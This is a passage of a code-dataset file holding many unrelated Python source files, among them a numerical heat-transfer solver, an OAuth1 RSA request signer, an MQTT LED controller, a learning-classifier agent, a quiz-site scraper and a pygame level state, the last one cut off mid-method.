s[:-bytes_to_remove]\r\n","sub_path":"src/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"391137434","text":"import numpy as np\nfrom tkinter_gui_builder.canvas_image_objects.abstract_canvas_image import AbstractCanvasImage\n\n\nclass NumpyCanvasDisplayImage(AbstractCanvasImage):\n\n def __init__(self):\n self.numpy_data = None # type: np.ndarray\n\n def init_from_fname_and_canvas_size(self,\n numpy_data, # type: np.ndarray\n canvas_ny, # type: int\n canvas_nx, # type: int\n scale_to_fit_canvas=True, # type: bool\n ):\n print(\"This is a special case of image object. use 'init_from_numpy_array_and_canvas_size' instead.\")\n pass\n\n def init_from_numpy_array_and_canvas_size(self, numpy_data, canvas_ny, canvas_nx):\n self.numpy_data = numpy_data\n numpy_dims = np.shape(numpy_data)\n self.full_image_nx = numpy_dims[1]\n self.full_image_ny = numpy_dims[0]\n self.canvas_nx = canvas_nx\n self.canvas_ny = canvas_ny\n self.update_canvas_display_image_from_full_image()\n\n def get_decimated_image_data_in_full_image_rect(self,\n full_image_rect, # type: (int, int, int, int)\n decimation, # type: int\n ):\n if decimation < 1:\n decimation = 1\n y1, x1, y2, x2 = int(full_image_rect[0]), int(full_image_rect[1]), int(full_image_rect[2]), int(full_image_rect[3])\n rect_data = self.numpy_data[y1:y2:decimation, x1:x2:decimation]\n return rect_data\n","sub_path":"tkinter_gui_builder/canvas_image_objects/numpy_canvas_image.py","file_name":"numpy_canvas_image.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"385284124","text":"# Import relevant modules\nimport numpy as np\n\n# Define constants\nu, L, H, rho, alph, n = 12, 1, 0.2, 1, 5, 4\n# Boundary conditions\nTA, TC, TD = 20, 100, 50\n\n# Calculate parameters\ndelx = L/2\ndely = H/2\nFx = rho*u\nDx = alph/delx\nDy = alph/dely\nAx = dely\nAy = delx\n\n# Create solution matrix\na = np.zeros((n, n))\nSu = np.zeros((n, 1))\n\n# Manually input solution to create matrix\n# node 1 (recall python start at 0)\nSu[0] = ((2*Dx+Fx)*Ax)*TA+(2*Dy*Ay)*TC\na[0, 1] = (Fx / 2 - Dx) * Ax\na[0, 2] = -Dy * Ay\na[0, 0] = (3 * Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n# node 2\nSu[1] = (2*Dy*Ay)*TC\na[1, 0] = -(Dx + Fx / 2) * Ax\na[1, 3] = -Dy * Ay\na[1, 1] = (Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n# node 3\nSu[2] = ((2*Dx+Fx)*Ax)*TA+2*Dy*Ay*TD\na[2, 0] = -Dy * Ay\na[2, 3] = -(Dx - Fx / 2) * Ax\na[2, 2] = (3 * Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n# node 4\nSu[3] = (2*Dy*Ay)*TD\na[3, 1] = -Dy * Ay\na[3, 2] = -(Dx + Fx / 2) * Ax\na[3, 3] = (Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n\n# Initialize solutions\nrelax, Nmax = 1.1, 3\nTj = np.zeros((n, Nmax))\nTgs = np.zeros((n, Nmax))\nTrlx = np.zeros((n, Nmax))\nSumj = np.zeros((n, Nmax))\nSumgs1 = np.zeros((n, Nmax))\nSumgs2 = np.zeros((n, Nmax))\n\n# Cycle through iterations k\nfor k in range(1, Nmax):\n # Cycle through matrix i,j\n for i in range(0, n):\n for j in range(0, n):\n # JM\n if j != i:\n Sumj[i, k] += -a[i, j] * Tj[j, k - 1]\n Tj[i, k] = (1 / a[i, i]) * (Sumj[i, k] + Su[i])\n # GSM\n if j <= i-1:\n Sumgs1[i, k] += -a[i, j] * Tgs[j, k]\n if j >= i+1:\n Sumgs2[i, k] += -a[i, j] * Tgs[j, k - 1]\n Tgs[i, k] = (1 / a[i, i]) * (Sumgs1[i, k] + Sumgs2[i, k] + Su[i])\n\n # RM\n Trlx[i, k] = relax*Tgs[i, k] + (1-relax)*Trlx[i, k-1]\n\n# Get exact solution\nTex = Tgs[:, Nmax-1]\n\n# Compute errors\nerr = np.zeros((3, 1))\nitnum = 3\nfor e in range(0, n):\n # Error for JM\n err[0] += abs(Tj[e, itnum] - Tex[e])\n # Error for GSM\n err[1] += abs(Tgs[e, itnum] - Tex[e])\n # Error for RLM\n err[2] += abs(Trlx[e, itnum] - Tex[e])\n\n# Export Results\nnp.savetxt('Results\\Tj.csv', Tj[:, 1:itnum+1], delimiter=',')\nnp.savetxt('Results\\Tgs.csv', Tgs[:, 1:itnum+1], delimiter=',')\nnp.savetxt('Results\\Trlx.csv', Trlx[:, 1:itnum+1], delimiter=',')\nnp.savetxt('Results\\err.csv', err[:, 1:itnum+1], delimiter=',')\n","sub_path":"A3/Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"318445051","text":"# Summation of primes\n\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n\n\ndef isPrime(number):\n\n\tif number == 2: return True\n\tif number > 2 and number % 2 == 0: return False\n\n\troot = int(number ** 0.5)\n\n\tfor i in range (3, root+1):\n\t\tif number % i == 0:\n\t\t\treturn False\n\n\treturn True\t\n\t\t\nresult = 0\n\nfor i in range(2, 2000000):\n\tif isPrime(i):\n\t\tresult += i\n\nprint(result)","sub_path":"Problems/010/010 Summation of Primes.py","file_name":"010 Summation of Primes.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"601232048","text":"import time\nfrom uuid import uuid4\n\nfrom requests.auth import AuthBase\nfrom OpenSSL.crypto import PKey\nfrom OpenSSL import crypto\nfrom requests import PreparedRequest\nimport hashlib\nfrom . import coreutils as util\n\nHASH_SHA1 = 'SHA1'\nHASH_SHA256 = 'SHA256'\n\n\ndef hash_func(hash_alg):\n return {\n HASH_SHA1: hashlib.sha1,\n HASH_SHA256: hashlib.sha256\n }[hash_alg]\n\n\nclass OAuth1RSA(AuthBase):\n \"\"\"OAuth1 RSA-SHA1/SHA256 requests's auth helper\n\n Usage:\n >>> from oauth1 import authenticationutils\n >>> from oauth1.auth_ext import OAuth1RSA\n >>> import requests\n >>> CONSUMER_KEY = 'secret-consumer-key'\n >>> pk = authenticationutils.load_signing_key('instance/masterpass.pfx', 'a3fa02536a')\n >>> oauth = OAuth1RSA(CONSUMER_KEY, pk)\n >>> requests.post('https://endpoint.com/the/route', data={'foo': 'bar'}, auth=oauth)\n \"\"\"\n\n def __init__(self, consumer_key: str, signing_key: PKey, hash_alg=HASH_SHA1):\n self.consumer_key = consumer_key\n self.signing_key = signing_key\n self.hash_alg = hash_alg\n self.hash_f = hash_func(hash_alg)\n\n def __call__(self, r: PreparedRequest):\n payload = {\n 'oauth_version': '1.0',\n 'oauth_nonce': self.nonce(),\n 'oauth_timestamp': str(self.timestamp()),\n 'oauth_signature_method': f'RSA-{self.hash_alg}',\n 'oauth_consumer_key': self.consumer_key\n }\n\n # Google's body hash extension\n payload = self.oauth_body_hash(r, payload)\n\n signable_message = self.signable_message(r, payload)\n signature = self.signature(signable_message)\n payload['oauth_signature'] = signature\n\n h = self._generate_header(payload)\n\n r.headers['Authorization'] = h\n return r\n\n @staticmethod\n def nonce():\n return str(uuid4())\n\n @staticmethod\n def timestamp():\n return int(time.time())\n\n def _hash(self, message: str) -> str:\n return self.hash_f(message.encode('utf8')).digest()\n\n @staticmethod\n def signable_message(r: PreparedRequest, payload: dict):\n params = [\n r.method.upper(),\n util.normalize_url(r.url),\n util.normalize_params(r.url, payload)\n ]\n params = map(util.uri_rfc3986_encode, params)\n return '&'.join(params)\n\n def signature(self, message: str):\n signature = crypto.sign(self.signing_key, message, self.hash_alg)\n return util.base64_encode(signature)\n\n @staticmethod\n def _generate_header(payload: dict):\n _ = util.uri_rfc3986_encode\n pts = [f'{_(k)}=\"{_(v)}\"' for k, v in sorted(payload.items())]\n msg = ','.join(pts)\n return f'OAuth {msg}'\n\n def oauth_body_hash(self, r: PreparedRequest, payload: dict):\n if r.headers.get('content-type') == 'multipart/form-data':\n return payload\n\n body = r.body\n payload['oauth_body_hash'] = util.uri_rfc3986_encode(util.base64_encode(self._hash(body)))\n return payload\n","sub_path":"oauth1/auth_ext.py","file_name":"auth_ext.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"134381806","text":"#!/usr/bin/env python\n\nimport time\nimport paho.mqtt.client as mqtt\nfrom RGBlib import displayColor\nfrom neopixel import *\nimport argparse\nimport json\n\nglobal CountRGB\nglobal ColorRGB\nglobal BrightnessRGB\n\nCountRGB = 8\nColorRGB= {\"r\":5,\"g\":5,\"b\":5,\"a\":1}\nBrightnessRGB = 120\n\ndef on_connect( client, userdata, flags, rc ):\n print(\"Connected with result code \" + str(rc))\n #client.subscribe(\"Test\")\n client.subscribe(\"RGBColor\")\n client.subscribe(\"RGBCount\")\n client.subscribe(\"RGBBrightness\")\n\ndef SetLed( jsonMSG, CountLEDs, BrightnessRGB ):\n print(\"in set LED\")\n color = json.loads(jsonMSG)\n displayColor( BrightnessRGB, CountLEDs, color[\"g\"], color[\"r\"], color[\"b\"])\n #displayColor( 5, 5, 5, 5)\n\ndef on_message( client, userdata, msg ):\n global CountRGB\n global ColorRGB\n global BrightnessRGB\n #print(msg.topic + \" \" + str(msg.payload))\n if msg.topic == \"RGBCount\":\n CountRGB = msg.payload.decode()\n CountRGB = int(CountRGB)\n elif msg.topic == \"RGBColor\":\n ColorRGB = msg.payload.decode()\n else:\n BrightnessRGB = msg.payload.decode()\n BrightnessRGB = int(BrightnessRGB)\n print(BrightnessRGB)\n \n print(\"Bevor auslöser\")\n SetLed( ColorRGB, CountRGB, BrightnessRGB )\n \n\n#if __name__ == \"__main__\":\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"localhost\", 1883, 60)\n\nclient.loop_forever()\n","sub_path":"NodeRed/RGB/NODE/RGB.py","file_name":"RGB.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"561280195","text":"import cv2\n# from maze import Maze\nfrom maze import Maze\n\n\nmaze_image = '../img/maze.png'\n\nstart = (9,12)\nend = (213,211)\n\ntest = True\n\ntest_img = cv2.imread(maze_image)\nif test:\n maze_solver = Maze(test_img)\n maze_solver.get_shortest_path(start=start, end=end)\n\n test_img = maze_solver.get_solution_image()\n\ncv2.imshow('image',test_img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"maze_solver/test_maze.py","file_name":"test_maze.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"411656259","text":"import logging\nfrom typing import Optional, Callable, Tuple, List\n\nfrom lcs.strategies.action_selection import choose_action\nfrom ...agents import Agent\nfrom ...agents.Agent import Metric\nfrom ...agents.racs import Configuration, ClassifierList\nfrom ...utils import parse_state, parse_action\n\n\nclass RACS(Agent):\n \"\"\"ACS2 agent operating on real-valued (floating) number\"\"\"\n\n def __init__(self,\n cfg: Configuration,\n population: ClassifierList=None) -> None:\n self.cfg = cfg\n self.population = population or ClassifierList()\n\n def explore(self, env, trials) -> Tuple:\n return self._evaluate(env, trials, self._run_trial_explore)\n\n def exploit(self, env, trials):\n pass\n\n def _evaluate(self, env, max_trials: int, func: Callable) -> Tuple:\n \"\"\"\n Runs the classifier in desired strategy (see `func`) and collects\n metrics.\n\n Parameters\n ----------\n env:\n OpenAI Gym environment\n max_trials: int\n maximum number of trials\n func: Callable\n Function accepting three parameters: env, steps already made,\n current trial\n\n Returns\n -------\n tuple\n population of classifiers and metrics\n \"\"\"\n current_trial = 0\n steps = 0\n\n metrics: List = []\n while current_trial < max_trials:\n steps_in_trial = func(env, steps, current_trial)\n steps += steps_in_trial\n\n # TODO: collect metrics\n\n current_trial += 1\n\n return self.population, metrics\n\n def _run_trial_explore(self, env, time, current_trial=None):\n logging.debug(\"** Running trial explore ** \")\n # Initial conditions\n steps = 0\n raw_state = env.reset()\n state = parse_state(raw_state, self.cfg.perception_mapper_fcn)\n action = None\n reward = None\n prev_state = None\n action_set = ClassifierList()\n done = False\n\n while not done:\n match_set = self.population.form_match_set(state)\n\n if steps > 0:\n # Apply learning in the last action set\n action_set.apply_alp(\n prev_state,\n action,\n state,\n time + steps,\n self.population,\n match_set,\n self.cfg)\n action_set.apply_reinforcement_learning(\n reward,\n match_set.get_maximum_fitness())\n if self.cfg.do_ga:\n pass\n # TODO: implement GA\n\n action = choose_action(\n match_set,\n self.cfg.number_of_possible_actions,\n self.cfg.epsilon)\n internal_action = parse_action(action, self.cfg.action_mapping_fcn)\n logging.debug(\"\\tExecuting action: [%d]\", action)\n action_set = match_set.form_action_set(action)\n\n prev_state = state\n raw_state, reward, done, _ = env.step(internal_action)\n state = parse_state(raw_state, self.cfg.perception_mapper_fcn)\n\n if done:\n action_set.apply_alp(\n prev_state,\n action,\n state,\n time + steps,\n self.population,\n None,\n self.cfg)\n action_set.apply_reinforcement_learning(\n reward,\n 0)\n if self.cfg.do_ga:\n pass\n # TODO: implement GA\n steps += 1\n\n return steps\n\n def _collect_agent_metrics(self, trial, steps, total_steps) -> Metric:\n return {\n \"population\": 0\n }\n\n def _collect_environment_metrics(self, env) -> Optional[Metric]:\n return None\n\n def _collect_performance_metrics(self, env) -> Optional[Metric]:\n return None\n","sub_path":"lcs/agents/racs/RACS.py","file_name":"RACS.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"488107476","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(0, np.pi * 2, 100)\nplt.subplot(3, 1, 1)\nplt.plot(x, np.sin(x), 'r')\nplt.grid(True)\nplt.xlim(0, np.pi * 2)\nplt.subplot(3, 1, 2)\nplt.plot(x, np.cos(x), 'g')\nplt.grid(True)\nplt.xlim(0, np.pi * 2)\nplt.subplot(3, 1, 3)\nplt.plot(x, np.sin(x), 'r', x, np.cos(x), 'g')\nplt.grid(True)\nplt.xlim(0, np.pi * 2)\nplt.savefig(\"fig3.png\", dpi=72)\nplt.show()\n","sub_path":"Matplotlib/plot11.py","file_name":"plot11.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"585037802","text":"# Week 10, ICA 2\nimport os\n\ndef main():\n enterData()\n displayData()\n search()\n modifyNum()\n try:\n evens = 0\n odds = 0\n inf = open('numbers.txt','r')\n for num in inf:\n num = int(num)\n if num % 2 == 0:\n evens += 1\n else:\n odds += 1\n print('The file had', evens, 'evens and', odds, 'odds')\n except IOError:\n print('File did not open')\n except ValueError as duh:\n print(duh)\n finally:\n print('Moving on...')\n\ndef enterData():\n outfile = open('nba.txt','w')\n for x in range(1,4):\n print('Enter data for player #', x, sep='')\n name = input('Name: ')\n num = input('Number: ')\n team = input('Team: ')\n outfile.write(name+'\\n')\n outfile.write(num+'\\n')\n outfile.write(team+'\\n')\n outfile.close()\n\ndef displayData():\n infile = open('nba.txt','r')\n for name in infile:\n name = name.rstrip('\\n')\n num = infile.readline().rstrip('\\n')\n team = infile.readline().rstrip('\\n')\n print(name,'wears number',num,'and plays for the',team)\n infile.close()\n\ndef search():\n found = False\n infile = open('nba.txt','r')\n # Prompt user to enter a player name\n disone = input('Enter the player name to search for: ')\n name = infile.readline().rstrip('\\n')\n while name != '' and not found:\n num = infile.readline().rstrip('\\n')\n team = infile.readline().rstrip('\\n')\n if name == disone:\n print(name, 'wears number', num, 'and plays for the', team)\n found = True\n else:\n name = infile.readline().rstrip('\\n')\n if not found:\n print(disone,'is not in the file')\n infile.close()\n\ndef modifyNum():\n found = False\n disone = input('Enter the player to search for: ')\n newnum = input('Enter the new number: ')\n infile = open('nba.txt','r')\n temp = open('temp.txt','w')\n name = infile.readline().rstrip('\\n')\n while name != '':\n num = infile.readline().rstrip('\\n')\n team = infile.readline().rstrip('\\n')\n if name == disone:\n temp.write(name + '\\n')\n temp.write(newnum + '\\n')\n temp.write(team + '\\n')\n found = True\n else:\n temp.write(name + '\\n')\n temp.write(num +'\\n')\n temp.write(team +'\\n')\n name = infile.readline().rstrip('\\n')\n infile.close()\n temp.close()\n os.remove('nba.txt')\n os.rename('temp.txt', 'nba.txt')\n if found:\n print('file has been updated')\n displayData()\n else:\n print(disone, 'is not in the file')\n\nmain() # Call main","sub_path":"ICA/Ch6P2.py","file_name":"Ch6P2.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"210055532","text":"from pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport urllib.request \nimport os.path\nimport collections\nimport re\nfrom json import *\nimport urllib.error\nfrom operator import itemgetter \n\nclient = MongoClient()\nclient = MongoClient('localhost', 27017)\ndb = client.indiabix\n\nurlCollection = db.urlCollection\ndomains={'simple-interest':32,'profit-and-loss':21,'problems-on-trains':19,'problems-on-ages':22,'average':23,'permutation-and-combination':24,'h.c.f-and-l.c.m':25,'time-and-distance':31}\n_offset=[0,31,61,91]\n_pageno=[0,1,2,3]\nurllist={}\n'''\nRoot of all Domains\n'''\ndom=sorted(domains)\nfor domain in dom:\n for i in range(0,4):\n offset=_offset[i]\n pageno=_pageno[i]\n if i==0:\n temp ='http://www.knowaptitude.in/questions/dumps/aptitude/arithmetic-aptitude/'+str(domain)+'?type=latest'\n else: \n temp='http://www.knowaptitude.in/ajax/Questions/dump_fetch/30/1/'+str(offset)+'/'+str(pageno)+'/4/'+str(domains[domain])+'/-1?type=latest'\n urllist.setdefault(domain,[]).append(temp)\n'''\nGetting all Domain Links\n'''\ndomques={}\nfoption=[]\nsdomain=sorted(urllist)\nfor key in sdomain:\n i=0\n for values in urllist[key]:\n r = urllib.request.urlopen(values).read()\n soup=BeautifulSoup(r,\"lxml\")\n for ntemp in soup.findAll(\"div\",{\"class\":\"dump_question\"}):\n if i==0:\n hquestion=ntemp.get_text().replace(\"\\\\r\",\"\").replace(\"\\\\n\",\"\").replace(\"\\\\t\",\"\").replace(\"\\t\",\"\").replace(\"\\\\\",\"\")\n finalquestion=re.findall('[0-9]{1,2}\\)(.*)',hquestion)\n fquestion=finalquestion[0].lstrip()\n else:\n hquestion=ntemp.get_text().replace(\"\\\\r\",\"\").replace(\"\\\\n\",\"\").replace(\"\\\\t\",\"\").replace(\"\\t\",\"\").replace(\"\\\\\",\"\")\n finalquestion=re.findall('[0-9]??\\)(.+?) A\\.',hquestion)\n fquestion=finalquestion[0].lstrip()\n domques.setdefault(key,[]).append(fquestion)\n i=i+1\n\n\nfor key,value in domques.items():\n print(\"\\n\\n\\n domain is \",key,\"\\n questions are :\",value)\n\nfor domain in domques.keys():\n #Opening a file for each domain\n domain_file_name = \"corpus/aptitude/\"+str(domain)+\".store\"\n if os.path.isfile(domain_file_name):\n print(\"Skipping : \",domain)\n continue\n domain_file = open(domain_file_name, 'w')\n print(\"Creating Files for \",domain)\n for question_div in domques[domain]:\n domain_file.write(question)\n domain_file.write('\\n')\n domain_file.close()\n print(domain,\" is completed !\")\n\n\n","sub_path":"knowapti.py","file_name":"knowapti.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"517460071","text":"from cpp._apollocaffe import Tensor, ApolloNet, CppConfig, make_numpy_data_param, Blob\nimport loggers\nimport utils\nfrom time import strftime\n\ndef set_cpp_loglevel(loglevel):\n CppConfig.set_cpp_loglevel(loglevel)\n\ndef set_device(device_id=-1):\n if device_id == -1:\n device_string = \"CPU device\"\n else:\n device_string = \"GPU device %d\" % device_id\n print(\"%s - %s\" % \\\n (strftime(\"%Y-%m-%d %H:%M:%S\"), device_string))\n CppConfig.set_device(device_id)\n\ndef set_random_seed(value):\n import numpy as np\n import random\n np.random.seed(value)\n random.seed(value)\n CppConfig.set_random_seed(value)\n\ndef base_parser():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--weights', default=None, type=str)\n parser.add_argument('--gpu', default=-1, type=int)\n parser.add_argument('--loglevel', default=3, type=int)\n parser.add_argument('--start_iter', default=0, type=int)\n return parser\n\nset_cpp_loglevel(3)\n\n# Apollocaffe uses print() over the obscure python logging module\n# Disable buffering of stdout ,equivalent to export PYTHONUNBUFFERED=x\nclass Unbuffered(object):\n def __init__(self, stream):\n self.stream = stream\n def write(self, data):\n self.stream.write(data)\n self.stream.flush()\n def __getattr__(self, attr):\n return getattr(self.stream, attr)\n\nimport sys\nsys.stdout = Unbuffered(sys.stdout)\n","sub_path":"python/apollocaffe/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"627425145","text":"import pandas as pd\nfrom sklearn.feature_selection import SelectKBest, chi2\nimport KMeansTestCluster as kmtc\nimport EMTestCluster as emtc\nfrom functions import *\n\"\"\"\n@author: vincentmarois\nThis python script applies chi2 statistical tests on the Letters dataset to retrieve only the k best features\n\"\"\"\n# import dataset\nletters = pd.read_csv('letters.csv')\n\n# separate dataset into features & labels\nX = (letters.drop('lettr', axis=1)).as_matrix()\ny = letters['lettr'].as_matrix()\n\n# instantiate DR model\nselector = SelectKBest(score_func=chi2, k=\"all\")\nX_transformed = selector.fit_transform(X, y)\n\n# consider the following ranges of clusters\nclusters = range(2, 41)\n\n# search the optimal value of k for Kmeans on the transformed dataset, while considering several metrics\n# (WSS, BSS/TSS ratio, Silhouette, V-measure)\nKMeanstester = kmtc.KMeansTestCluster(X_transformed, y, clusters=clusters, plot=False, stats=True, name=\"loans\")\n_, _, Kmeans_silhouette, Kmeans_V_measure = KMeanstester.run()\n\n# search the optimal value of k for EM on the transformed dataset, while considering several metrics\n# (log-likelihood, Bayesian Information Criterion, Silhouette, V-measure)\nEMtester = emtc.EMTestCluster(X_transformed, y, clusters=clusters, plot=False, stats=True, name=\"loans\")\n_, _, EM_silhouette, EM_V_measure = EMtester.run()\n\n# Plot the Silhouette Score & V-measure metrics on same figure to compare both algorithms\nplot_silhouette_v_measure(algorithm=\"Kmeans\", clusters=clusters, silhouette=Kmeans_silhouette, v_measure=Kmeans_V_measure)\nplot_silhouette_v_measure(algorithm=\"EM\", clusters=clusters, silhouette=EM_silhouette, v_measure=EM_V_measure)","sub_path":"CS7641/Unsupervised Learning and Dimensionality Reduction/letters-dataset/letters_SelectKBest_clustering.py","file_name":"letters_SelectKBest_clustering.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"318912561","text":"import _Bulm\nimport numpy as np\n\ndef compute_Bulm(Blm, L, freq, d, L1):#freq in Mhz, d in equatorial coor in meters\n if d[0] == 0 and d[1] == 0 and d[2] == 0:\n Bulm = np.zeros((L+1, 2*L+1), dtype='complex64')\n Bulm[:L1+1,:L1+1] = Blm[:,:L1+1]\n Bulm[:L1+1,-(L1+1):] = Blm[:,-(L1+1):]\n return Bulm\n else:\n return _Bulm.compute_Bulm(Blm, L, freq, d[0], d[1], d[2], L1)\n","sub_path":"build/lib.macosx-10.6-x86_64-2.7/HERA_MapMaking_VisibilitySimulation/Bulm.py","file_name":"Bulm.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"542959612","text":"from SpriteSheet import Spritesheet\n\n\nclass Obstacle(Spritesheet):\n def __init__(self, pos, vel, image):\n self.img = image\n self.width = self.img.get_width()\n self.height = self.img.get_height()\n self.pos = pos\n self.vel = vel\n\n\n","sub_path":"Obstacle.py","file_name":"Obstacle.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494136405","text":"class Solution:\n def twoSum(self, nums, target):\n if len(nums) == 0 or nums == None:\n return []\n\n hashmap = {}\n\n for i, number in enumerate(nums):\n complement = target - number\n\n i2 = hashmap.get(complement, None)\n\n if i2 is not None:\n return [i2, i]\n\n hashmap[number] = i\n\n return []\n","sub_path":"1 - Two Sum/python/twosum.py","file_name":"twosum.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"464550661","text":"import sys\nimport pygame as pg\nfrom .. import tools, collision\nfrom .. import constants as c\nfrom .. components import actors, portal\nfrom .. import tilerender\nfrom .. import setup\nfrom . import generic_menu\n\nclass LevelState(tools._State):\n\tdef __init__(self, name):\n\t\tsuper(LevelState, self).__init__()\n\t\tself.name = name\n\t\tself.portal = None\n\t\tself.tmx_map = setup.TMX[name]\n\n\tdef startup(self, game_data):\n\t\t\"\"\"Initialize the State object when flipped\"\"\"\n\t\tself.game_screen = pg.display.get_surface()\n\t\tself.game_data = game_data\n\t\tself.state = 'transition_in'\n\t\tself.allow_input = False\n\t\tself.renderer = tilerender.Renderer(self.tmx_map)\n\t\tself.map_image = self.renderer.make_map()\n\n\t\tself.viewport = self.make_viewport(self.map_image)\n\t\tself.level_surface = self.make_level_surface(self.map_image)\n\t\tself.level_rect = self.level_surface.get_rect()\n\t\tself.player = self.make_player()\n\t\tself.blockers = self.make_blockers()\n\t\tself.sprites = self.make_sprites()\n\t\tself.portals = self.make_level_portals()\n\n\t\tself.collision_handler = collision.CollisionHandler(self.player, self.blockers, self.sprites, self.portals, self)\n\n\t\tself.state_dict = self.make_state_dict()\n\t\tself.transition_rect = setup.SCREEN.get_rect()\n\t\tself.menu_screen = generic_menu.Player_menu(game_data, self)\n\t\tself.transition_alpha = 255\n\n\t\tself.use_portal = False\n\n\tdef make_viewport(self, map_image):\n\t\t\"\"\"Create viewport\"\"\"\n\t\tmap_rect = map_image.get_rect()\n\t\treturn setup.SCREEN.get_rect(bottom=map_rect.bottom)\n\n\tdef make_level_surface(self, map_image):\n\t\t\"\"\"\n\t\tCreate the surface all images are blitted to.\n\t\t\"\"\"\n\t\tmap_rect = map_image.get_rect()\n\t\tmap_width = map_rect.width\n\t\tmap_height = map_rect.height\n\t\tsize = map_width, map_height\n\n\t\treturn pg.Surface(size).convert()\n\n\tdef make_player(self):\n\t\t\"\"\"\n\t\tMake the player and sets location.\n\t\t\"\"\"\n\t\tlast_state = self.previous\n\n\t\tfor object in self.renderer.tmx_data.getObjects():\n\t\t\tproperties = object.__dict__\n\t\t\tif properties['name'] == 'start point':\n\t\t\t\tif last_state == properties['state']:\n\t\t\t\t\tposx = properties['x']\n\t\t\t\t\tposy = properties['y'] - properties['height']\n\t\t\t\t\tplayer = actors.Player(properties['direction'],\n\t\t\t\t\t self.game_data)\n\t\t\t\t\tplayer.rect.x = posx\n\t\t\t\t\tplayer.rect.y = posy\n\n\t\treturn player\n\n\tdef make_state_dict(self):\n\t\t\"\"\"\n\t\tMake a dictionary of states the level can be in.\n\t\t\"\"\"\n\t\tstate_dict = {'normal': self.running_normally,\n\t\t #'dialogue': self.handling_dialogue,\n\t\t 'menu': self.goto_menu,\n\t\t 'transition_in': self.transition_in,\n\t\t 'transition_out': self.transition_out}\n\t\t #'slow transition out': self.slow_fade_out}\n\n\t\treturn state_dict\n\n\tdef make_blockers(self):\n\t\t\"\"\"\n Make the blockers for the level.\n \"\"\"\n\t\tblockers = []\n\n\t\tfor object in self.renderer.tmx_data.getObjects():\n\t\t\tproperties = object.__dict__\n\t\t\tif properties['name'] == 'blocker':\n\t\t\t\tleft = properties['x']\n\t\t\t\ttop = properties['y']\n\t\t\t\tblocker = pg.Rect(left, top, properties['width'], properties['height'])\n\t\t\t\tblockers.append(blocker)\n\n\t\treturn blockers\n\n\tdef make_sprites(self):\n\t\tsprites = []\n\t\treturn sprites\n\n\tdef make_level_portals(self):\n\t\tportal_group = pg.sprite.Group()\n\n\t\tfor object in self.renderer.tmx_data.getObjects():\n\t\t\tproperties = object.__dict__\n\t\t\tif properties['name'] == 'portal':\n\t\t\t\tposx = properties['x']\n\t\t\t\tposy = (properties['y']) - properties['height']\n\t\t\t\tnew_state = properties['type']\n\t\t\t\tportal_group.add(portal.Portal(posx, posy, new_state))\n\n\t\treturn portal_group\n\n\tdef check_for_portals(self):\n\t\tif self.use_portal and not self.done:\n\t\t\tself.player.location = self.player.get_tile_location()\n\t\t\tself.next = self.portal\n\t\t\tself.state = 'transition_out'\n\n\tdef running_normally(self, surface, keys):\n\t\tself.player.update(keys)\n\t\tself.collision_handler.update(keys)\n\t\tself.check_for_portals()\n\t\tself.check_for_menu(keys)\n\t\tself.viewport_update()\n\t\tself.draw_level(surface)\n\n\tdef check_for_menu(self, keys):\n\t\tif keys[pg.K_RETURN] and self.allow_input:\n\t\t\tif self.player.state == 'resting':\n\t\t\t\tself.state = 'menu'\n\t\t\t\tself.allow_input = False\n\n\t\tif not keys[pg.K_RETURN]:\n\t\t\tself.allow_input = True\n\n\tdef goto_menu(self, surface, keys, *args):\n\t\tself.menu_screen.update(surface, keys)\n\t\tself.menu_screen.draw(surface)\n\n\tdef transition_out(self, surface, *args):\n\t\t\"\"\"\n\t\tTransition level to new 